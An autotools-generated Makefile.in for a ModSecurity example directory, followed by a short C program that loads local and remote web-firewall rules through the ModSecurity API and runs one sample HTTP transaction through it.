am__aclocal_m4_deps = $(top_srcdir)/build/ax_prog_doxygen.m4 \ $(top_srcdir)/build/ax_valgrind_check.m4 \ $(top_srcdir)/build/curl.m4 $(top_srcdir)/build/libgeoip.m4 \ $(top_srcdir)/build/libmaxmind.m4 \ $(top_srcdir)/build/libtool.m4 $(top_srcdir)/build/libxml.m4 \ $(top_srcdir)/build/lmdb.m4 $(top_srcdir)/build/ltoptions.m4 \ $(top_srcdir)/build/ltsugar.m4 \ $(top_srcdir)/build/ltversion.m4 \ $(top_srcdir)/build/lt~obsolete.m4 $(top_srcdir)/build/lua.m4 \ $(top_srcdir)/build/pcre.m4 $(top_srcdir)/build/ssdeep.m4 \ $(top_srcdir)/build/yajl.m4 $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ $(ACLOCAL_M4) DIST_COMMON = $(srcdir)/Makefile.am $(am__DIST_COMMON) mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = CONFIG_CLEAN_VPATH_FILES = PROGRAMS = $(noinst_PROGRAMS) am_test_OBJECTS = test-test.$(OBJEXT) test_OBJECTS = $(am_test_OBJECTS) am__DEPENDENCIES_1 = test_DEPENDENCIES = $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) AM_V_lt = $(am__v_lt_@AM_V@) am__v_lt_ = $(am__v_lt_@AM_DEFAULT_V@) am__v_lt_0 = --silent am__v_lt_1 = test_LINK = $(LIBTOOL) $(AM_V_lt) --tag=CC $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=link $(CCLD) $(test_CFLAGS) $(CFLAGS) \ $(test_LDFLAGS) $(LDFLAGS) -o $@ AM_V_P = $(am__v_P_@AM_V@) am__v_P_ = $(am__v_P_@AM_DEFAULT_V@) am__v_P_0 = false am__v_P_1 = : AM_V_GEN = $(am__v_GEN_@AM_V@) am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@) am__v_GEN_0 = @echo " GEN " $@; am__v_GEN_1 = AM_V_at = $(am__v_at_@AM_V@) am__v_at_ = $(am__v_at_@AM_DEFAULT_V@) am__v_at_0 = @ am__v_at_1 = DEFAULT_INCLUDES = -I.@am__isrc@ -I$(top_builddir)/src depcomp = $(SHELL) $(top_srcdir)/depcomp am__maybe_remake_depfiles = depfiles am__depfiles_remade = ./$(DEPDIR)/test-test.Po am__mv = mv -f COMPILE = $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) \ $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) LTCOMPILE = $(LIBTOOL) $(AM_V_lt) --tag=CC $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=compile $(CC) $(DEFS) \ $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) \ $(AM_CFLAGS) $(CFLAGS) AM_V_CC = $(am__v_CC_@AM_V@) am__v_CC_ = $(am__v_CC_@AM_DEFAULT_V@) am__v_CC_0 = @echo " CC " $@; am__v_CC_1 = CCLD = $(CC) LINK = $(LIBTOOL) $(AM_V_lt) --tag=CC $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=link $(CCLD) $(AM_CFLAGS) $(CFLAGS) \ $(AM_LDFLAGS) $(LDFLAGS) -o $@ AM_V_CCLD = $(am__v_CCLD_@AM_V@) am__v_CCLD_ = $(am__v_CCLD_@AM_DEFAULT_V@) am__v_CCLD_0 = @echo " CCLD " $@; am__v_CCLD_1 = SOURCES = $(test_SOURCES) DIST_SOURCES = $(test_SOURCES) am__can_run_installinfo = \ case $$AM_UPDATE_INFO_DIR in \ n|no|NO) false;; \ *) (install-info --version) >/dev/null 2>&1;; \ esac am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP) # Read a list of newline-separated strings from the standard input, # and print each of them once, without duplicates. Input order is # *not* preserved. am__uniquify_input = $(AWK) '\ BEGIN { nonempty = 0; } \ { items[$$0] = 1; nonempty = 1; } \ END { if (nonempty) { for (i in items) print i; }; } \ ' # Make sure the list of sources is unique. This is necessary because, # e.g., the same source file might be shared among _SOURCES variables # for different programs/libraries. am__define_uniq_tagged_files = \ list='$(am__tagged_files)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | $(am__uniquify_input)` ETAGS = etags CTAGS = ctags am__DIST_COMMON = $(srcdir)/Makefile.in $(top_srcdir)/depcomp DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) ACLOCAL = @ACLOCAL@ AMTAR = @AMTAR@ AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@ AR = @AR@ AUTOCONF = @AUTOCONF@ AUTOHEADER = @AUTOHEADER@ AUTOMAKE = @AUTOMAKE@ AWK = @AWK@ BISON = @BISON@ CC = @CC@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ CURL_CFLAGS = @CURL_CFLAGS@ CURL_CONFIG = @CURL_CONFIG@ CURL_CPPFLAGS = @CURL_CPPFLAGS@ CURL_DISPLAY = @CURL_DISPLAY@ CURL_FOUND = @CURL_FOUND@ CURL_LDADD = @CURL_LDADD@ CURL_LDFLAGS = @CURL_LDFLAGS@ CURL_USES_GNUTLS = @CURL_USES_GNUTLS@ CURL_VERSION = @CURL_VERSION@ CXX = @CXX@ CXXCPP = @CXXCPP@ CXXDEPMODE = @CXXDEPMODE@ CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ DLLTOOL = @DLLTOOL@ DOXYGEN_PAPER_SIZE = @DOXYGEN_PAPER_SIZE@ DSYMUTIL = @DSYMUTIL@ DUMPBIN = @DUMPBIN@ DX_CONFIG = @DX_CONFIG@ DX_DOCDIR = @DX_DOCDIR@ DX_DOT = @DX_DOT@ DX_DOXYGEN = @DX_DOXYGEN@ DX_DVIPS = @DX_DVIPS@ DX_EGREP = @DX_EGREP@ DX_ENV = @DX_ENV@ DX_FLAG_chi = @DX_FLAG_chi@ DX_FLAG_chm = @DX_FLAG_chm@ DX_FLAG_doc = @DX_FLAG_doc@ DX_FLAG_dot = @DX_FLAG_dot@ DX_FLAG_html = @DX_FLAG_html@ DX_FLAG_man = @DX_FLAG_man@ DX_FLAG_pdf = @DX_FLAG_pdf@ DX_FLAG_ps = @DX_FLAG_ps@ DX_FLAG_rtf = @DX_FLAG_rtf@ DX_FLAG_xml = @DX_FLAG_xml@ DX_HHC = @DX_HHC@ DX_LATEX = @DX_LATEX@ DX_MAKEINDEX = @DX_MAKEINDEX@ DX_PDFLATEX = @DX_PDFLATEX@ DX_PERL = @DX_PERL@ DX_PROJECT = @DX_PROJECT@ ECHO_C = @ECHO_C@ ECHO_N = @ECHO_N@ ECHO_T = @ECHO_T@ EGREP = @EGREP@ ENABLE_VALGRIND_drd = @ENABLE_VALGRIND_drd@ ENABLE_VALGRIND_helgrind = @ENABLE_VALGRIND_helgrind@ ENABLE_VALGRIND_memcheck = @ENABLE_VALGRIND_memcheck@ ENABLE_VALGRIND_sgcheck = @ENABLE_VALGRIND_sgcheck@ EXEEXT = @EXEEXT@ FGREP = @FGREP@ FLEX = @FLEX@ GEOIP_CFLAGS = @GEOIP_CFLAGS@ GEOIP_DISPLAY = @GEOIP_DISPLAY@ GEOIP_FOUND = @GEOIP_FOUND@ GEOIP_LDADD = @GEOIP_LDADD@ GEOIP_LDFLAGS = @GEOIP_LDFLAGS@ GEOIP_LIBS = @GEOIP_LIBS@ GEOIP_VERSION = @GEOIP_VERSION@ GLOBAL_CFLAGS = @GLOBAL_CFLAGS@ GLOBAL_CPPFLAGS = @GLOBAL_CPPFLAGS@ GLOBAL_LDADD = @GLOBAL_LDADD@ GREP = @GREP@ INSTALL = @INSTALL@ INSTALL_DATA = @INSTALL_DATA@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_SCRIPT = @INSTALL_SCRIPT@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ LEX = @LEX@ LEXLIB = @LEXLIB@ LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ LIBXML2_CFLAGS = @LIBXML2_CFLAGS@ LIBXML2_CONFIG = @LIBXML2_CONFIG@ LIBXML2_CPPFLAGS = @LIBXML2_CPPFLAGS@ LIBXML2_DISPLAY = @LIBXML2_DISPLAY@ LIBXML2_FOUND = @LIBXML2_FOUND@ LIBXML2_LDADD = @LIBXML2_LDADD@ LIBXML2_LDFLAGS = @LIBXML2_LDFLAGS@ LIBXML2_VERSION = @LIBXML2_VERSION@ LIPO = @LIPO@ LMDB_CFLAGS = @LMDB_CFLAGS@ LMDB_DISPLAY = @LMDB_DISPLAY@ LMDB_FOUND = @LMDB_FOUND@ LMDB_LDADD = @LMDB_LDADD@ LMDB_LDFLAGS = @LMDB_LDFLAGS@ LMDB_LIBS = @LMDB_LIBS@ LMDB_VERSION = @LMDB_VERSION@ LN_S = @LN_S@ LTLIBOBJS = @LTLIBOBJS@ LT_SYS_LIBRARY_PATH = @LT_SYS_LIBRARY_PATH@ LUA_CFLAGS = @LUA_CFLAGS@ LUA_DISPLAY = @LUA_DISPLAY@ LUA_FOUND = @LUA_FOUND@ LUA_LDADD = @LUA_LDADD@ LUA_LDFLAGS = @LUA_LDFLAGS@ MAKEINFO = @MAKEINFO@ MANIFEST_TOOL = @MANIFEST_TOOL@ MAXMIND_CFLAGS = @MAXMIND_CFLAGS@ MAXMIND_DISPLAY = @MAXMIND_DISPLAY@ MAXMIND_FOUND = @MAXMIND_FOUND@ MAXMIND_LDADD = @MAXMIND_LDADD@ MAXMIND_LDFLAGS = @MAXMIND_LDFLAGS@ MAXMIND_LIBS = @MAXMIND_LIBS@ MAXMIND_VERSION = @MAXMIND_VERSION@ MKDIR_P = @MKDIR_P@ MODSEC_MUTEX_ON_PM = @MODSEC_MUTEX_ON_PM@ MODSEC_NO_LOGS = @MODSEC_NO_LOGS@ MSC_BASE_DIR = @MSC_BASE_DIR@ MSC_GIT_VERSION = @MSC_GIT_VERSION@ MSC_VERSION = @MSC_VERSION@ MSC_VERSION_INFO = @MSC_VERSION_INFO@ MSC_VERSION_WITH_PATCHLEVEL = @MSC_VERSION_WITH_PATCHLEVEL@ NM = @NM@ NMEDIT = @NMEDIT@ OBJDUMP = @OBJDUMP@ OBJEXT = @OBJEXT@ OTOOL = @OTOOL@ OTOOL64 = @OTOOL64@ PACKAGE = @PACKAGE@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ PCRE_CFLAGS = @PCRE_CFLAGS@ PCRE_CONFIG = @PCRE_CONFIG@ PCRE_CPPFLAGS = @PCRE_CPPFLAGS@ PCRE_LDADD = @PCRE_LDADD@ PCRE_LDFLAGS = @PCRE_LDFLAGS@ PCRE_LD_PATH = @PCRE_LD_PATH@ PCRE_VERSION = @PCRE_VERSION@ PKG_CONFIG = @PKG_CONFIG@ PKG_CONFIG_LIBDIR = @PKG_CONFIG_LIBDIR@ PKG_CONFIG_PATH = @PKG_CONFIG_PATH@ RANLIB = @RANLIB@ SED = @SED@ SET_MAKE = @SET_MAKE@ SHELL = @SHELL@ SSDEEP_CFLAGS = @SSDEEP_CFLAGS@ SSDEEP_DISPLAY = @SSDEEP_DISPLAY@ SSDEEP_FOUND = @SSDEEP_FOUND@ SSDEEP_LDADD = @SSDEEP_LDADD@ SSDEEP_LDFLAGS = @SSDEEP_LDFLAGS@ STRIP = @STRIP@ VALGRIND = @VALGRIND@ VALGRIND_ENABLED = @VALGRIND_ENABLED@ VERSION = @VERSION@ YACC = @YACC@ YACC_INST = @YACC_INST@ YAJL_CFLAGS = @YAJL_CFLAGS@ YAJL_DISPLAY = @YAJL_DISPLAY@ YAJL_FOUND = @YAJL_FOUND@ YAJL_LDADD = @YAJL_LDADD@ YAJL_LDFLAGS = @YAJL_LDFLAGS@ YAJL_LIBS = @YAJL_LIBS@ YAJL_VERSION = @YAJL_VERSION@ YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_AR = @ac_ct_AR@ ac_ct_CC = @ac_ct_CC@ ac_ct_CXX = @ac_ct_CXX@ ac_ct_DUMPBIN = @ac_ct_DUMPBIN@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ am__tar = @am__tar@ am__untar = @am__untar@ bindir = @bindir@ build = @build@ build_alias = @build_alias@ build_cpu = @build_cpu@ build_os = @build_os@ build_vendor = @build_vendor@ builddir = @builddir@ datadir = @datadir@ datarootdir = @datarootdir@ docdir = @docdir@ dvidir = @dvidir@ exec_prefix = @exec_prefix@ host = @host@ host_alias = @host_alias@ host_cpu = @host_cpu@ host_os = @host_os@ host_vendor = @host_vendor@ htmldir = @htmldir@ includedir = @includedir@ infodir = @infodir@ install_sh = @install_sh@ libdir = @libdir@ libexecdir = @libexecdir@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ program_transform_name = @program_transform_name@ psdir = @psdir@ sbindir = @sbindir@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ valgrind_enabled_tools = @valgrind_enabled_tools@ valgrind_tools = @valgrind_tools@ test_SOURCES = \ test.c test_LDADD = \ $(GLOBAL_LDADD) \ $(LUA_LDADD) \ $(SSDEEP_LDADD) test_LDFLAGS = \ -L$(top_builddir)/src/.libs/ \ $(GEOIP_LDFLAGS) \ -lmodsecurity \ -lm \ -lstdc++ \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(YAJL_LDFLAGS) test_CFLAGS = \ -I$(top_builddir)/headers \ -I$(top_builddir) \ $(GLOBAL_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in all: all-am .SUFFIXES: .SUFFIXES: .c .lo .o .obj $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign examples/simple_example_using_c/Makefile'; \ $(am__cd) $(top_srcdir) && \ $(AUTOMAKE) --foreign examples/simple_example_using_c/Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ *config.status*) \ cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \ *) \ echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles)'; \ cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles);; \ esac; $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(am__aclocal_m4_deps): clean-noinstPROGRAMS: @list='$(noinst_PROGRAMS)'; test -n "$$list" || exit 0; \ echo " rm -f" $$list; \ rm -f $$list || exit $$?; \ test -n "$(EXEEXT)" || exit 0; \ list=`for p in $$list; do echo "$$p"; done | sed 's/$(EXEEXT)$$//'`; \ echo " rm -f" $$list; \ rm -f $$list test$(EXEEXT): $(test_OBJECTS) $(test_DEPENDENCIES) $(EXTRA_test_DEPENDENCIES) @rm -f test$(EXEEXT) $(AM_V_CCLD)$(test_LINK) $(test_OBJECTS) $(test_LDADD) $(LIBS) mostlyclean-compile: -rm -f *.$(OBJEXT) distclean-compile: -rm -f *.tab.c @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/test-test.Po@am__quote@ # am--include-marker $(am__depfiles_remade): @$(MKDIR_P) $(@D) @echo '# dummy' >$@-t && $(am__mv) $@-t $@ am--depfiles: $(am__depfiles_remade) .c.o: @am__fastdepCC_TRUE@ $(AM_V_CC)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.o$$||'`;\ @am__fastdepCC_TRUE@ $(COMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCC_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCC_FALSE@ $(AM_V_CC)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCC_FALSE@ $(AM_V_CC@am__nodep@)$(COMPILE) -c -o $@ $< .c.obj: @am__fastdepCC_TRUE@ $(AM_V_CC)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.obj$$||'`;\ @am__fastdepCC_TRUE@ $(COMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ `$(CYGPATH_W) '$<'` &&\ @am__fastdepCC_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCC_FALSE@ $(AM_V_CC)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCC_FALSE@ $(AM_V_CC@am__nodep@)$(COMPILE) -c -o $@ `$(CYGPATH_W) '$<'` .c.lo: @am__fastdepCC_TRUE@ $(AM_V_CC)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.lo$$||'`;\ @am__fastdepCC_TRUE@ $(LTCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCC_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Plo @AMDEP_TRUE@@am__fastdepCC_FALSE@ $(AM_V_CC)source='$<' object='$@' libtool=yes @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCC_FALSE@ $(AM_V_CC@am__nodep@)$(LTCOMPILE) -c -o $@ $< test-test.o: test.c @am__fastdepCC_TRUE@ $(AM_V_CC)$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(test_CFLAGS) $(CFLAGS) -MT test-test.o -MD -MP -MF $(DEPDIR)/test-test.Tpo -c -o test-test.o `test -f 'test.c' || echo '$(srcdir)/'`test.c @am__fastdepCC_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/test-test.Tpo $(DEPDIR)/test-test.Po @AMDEP_TRUE@@am__fastdepCC_FALSE@ $(AM_V_CC)source='test.c' object='test-test.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCC_FALSE@ $(AM_V_CC@am__nodep@)$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(test_CFLAGS) $(CFLAGS) -c -o test-test.o `test -f 'test.c' || echo '$(srcdir)/'`test.c test-test.obj: test.c @am__fastdepCC_TRUE@ $(AM_V_CC)$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(test_CFLAGS) $(CFLAGS) -MT test-test.obj -MD -MP -MF $(DEPDIR)/test-test.Tpo -c -o test-test.obj `if test -f 'test.c'; then $(CYGPATH_W) 'test.c'; else $(CYGPATH_W) '$(srcdir)/test.c'; fi` @am__fastdepCC_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/test-test.Tpo $(DEPDIR)/test-test.Po @AMDEP_TRUE@@am__fastdepCC_FALSE@ $(AM_V_CC)source='test.c' object='test-test.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCC_FALSE@ $(AM_V_CC@am__nodep@)$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(test_CFLAGS) $(CFLAGS) -c -o test-test.obj `if test -f 'test.c'; then $(CYGPATH_W) 'test.c'; else $(CYGPATH_W) '$(srcdir)/test.c'; fi` mostlyclean-libtool: -rm -f *.lo clean-libtool: -rm -rf .libs _libs ID: $(am__tagged_files) $(am__define_uniq_tagged_files); mkid -fID $$unique tags: tags-am TAGS: tags tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) set x; \ here=`pwd`; \ $(am__define_uniq_tagged_files); \ shift; \ if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ if test $$# -gt 0; then \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ "$$@" $$unique; \ else \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ $$unique; \ fi; \ fi ctags: ctags-am CTAGS: ctags ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) $(am__define_uniq_tagged_files); \ test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ && $(am__cd) $(top_srcdir) \ && gtags -i $(GTAGS_ARGS) "$$here" cscopelist: cscopelist-am cscopelist-am: $(am__tagged_files) list='$(am__tagged_files)'; \ case "$(srcdir)" in \ [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \ *) sdir=$(subdir)/$(srcdir) ;; \ esac; \ for i in $$list; do \ if test -f "$$i"; then \ echo "$(subdir)/$$i"; \ else \ echo "$$sdir/$$i"; \ fi; \ done >> $(top_builddir)/cscope.files distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags distdir: $(BUILT_SOURCES) $(MAKE) $(AM_MAKEFLAGS) distdir-am distdir-am: $(DISTFILES) @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ dist_files=`for file in $$list; do echo $$file; done | \ sed -e "s|^$$srcdirstrip/||;t" \ -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \ case $$dist_files in \ */*) $(MKDIR_P) `echo "$$dist_files" | \ sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \ sort -u` ;; \ esac; \ for file in $$dist_files; do \ if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ if test -d "$(distdir)/$$file"; then \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ test -f "$(distdir)/$$file" \ || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done check-am: all-am check: check-am all-am: Makefile $(PROGRAMS) installdirs: install: install-am install-exec: install-exec-am install-data: install-data-am uninstall: uninstall-am install-am: all-am @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am installcheck: installcheck-am install-strip: if test -z '$(STRIP)'; then \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ install; \ else \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \ fi mostlyclean-generic: clean-generic: distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @echo "it deletes files that may require special tools to rebuild." -test -z "$(MAINTAINERCLEANFILES)" || rm -f $(MAINTAINERCLEANFILES) clean: clean-am clean-am: clean-generic clean-libtool clean-noinstPROGRAMS \ mostlyclean-am distclean: distclean-am -rm -f ./$(DEPDIR)/test-test.Po -rm -f Makefile distclean-am: clean-am distclean-compile distclean-generic \ distclean-tags dvi: dvi-am dvi-am: html: html-am html-am: info: info-am info-am: install-data-am: install-dvi: install-dvi-am install-dvi-am: install-exec-am: install-html: install-html-am install-html-am: install-info: install-info-am install-info-am: install-man: install-pdf: install-pdf-am install-pdf-am: install-ps: install-ps-am install-ps-am: installcheck-am: maintainer-clean: maintainer-clean-am -rm -f ./$(DEPDIR)/test-test.Po -rm -f Makefile maintainer-clean-am: distclean-am maintainer-clean-generic mostlyclean: mostlyclean-am mostlyclean-am: mostlyclean-compile mostlyclean-generic \ mostlyclean-libtool pdf: pdf-am pdf-am: ps: ps-am ps-am: uninstall-am: .MAKE: install-am install-strip .PHONY: CTAGS GTAGS TAGS all all-am am--depfiles check check-am clean \ clean-generic clean-libtool clean-noinstPROGRAMS cscopelist-am \ ctags ctags-am distclean distclean-compile distclean-generic \ distclean-libtool distclean-tags distdir dvi dvi-am html \ html-am info info-am install install-am install-data \ install-data-am install-dvi install-dvi-am install-exec \ install-exec-am install-html install-html-am install-info \ install-info-am install-man install-pdf install-pdf-am \ install-ps install-ps-am install-strip installcheck \ installcheck-am installdirs maintainer-clean \ maintainer-clean-generic mostlyclean mostlyclean-compile \ mostlyclean-generic mostlyclean-libtool pdf pdf-am ps ps-am \ tags tags-am uninstall uninstall-am .PRECIOUS: Makefile # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: modsecurity-v3.0.4/examples/simple_example_using_c/test.c0000644000175000017500000000416313607066010024164 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #include #include #include "modsecurity/modsecurity.h" #include "modsecurity/rules.h" char main_rule_uri[] = "basic_rules.conf"; int main (int argc, char **argv) { int ret; const char *error = NULL; ModSecurity *modsec; Transaction *transaction = NULL; Rules *rules; modsec = msc_init(); msc_set_connector_info(modsec, "ModSecurity-test v0.0.1-alpha (Simple " \ "example on how to use ModSecurity API"); rules = msc_create_rules_set(); ret = msc_rules_add_file(rules, main_rule_uri, &error); if (ret < 0) { fprintf(stderr, "Problems loading the rules --\n"); fprintf(stderr, "%s\n", error); goto end; } msc_rules_dump(rules); ret = msc_rules_add_remote(rules, "test", "https://www.modsecurity.org/modsecurity-regression-test-secremoterules.txt", &error); if (ret < 0) { fprintf(stderr, "Problems loading the rules --\n"); fprintf(stderr, "%s\n", error); goto end; } msc_rules_dump(rules); transaction = msc_new_transaction(modsec, rules, NULL); msc_process_connection(transaction, "127.0.0.1", 12345, "127.0.0.1", 80); msc_process_uri(transaction, "http://www.modsecurity.org/test?key1=value1&key2=value2&key3=value3", "GET", "1.1"); msc_process_request_headers(transaction); msc_process_request_body(transaction); msc_process_response_headers(transaction, 200, "HTTP 1.3"); msc_process_response_body(transaction); msc_process_logging(transaction); end: msc_rules_cleanup(rules); msc_cleanup(modsec); return 0; } modsecurity-v3.0.4/examples/simple_example_using_c/test-valgrind.sh0000755000175000017500000000014413607066010026156 0ustar 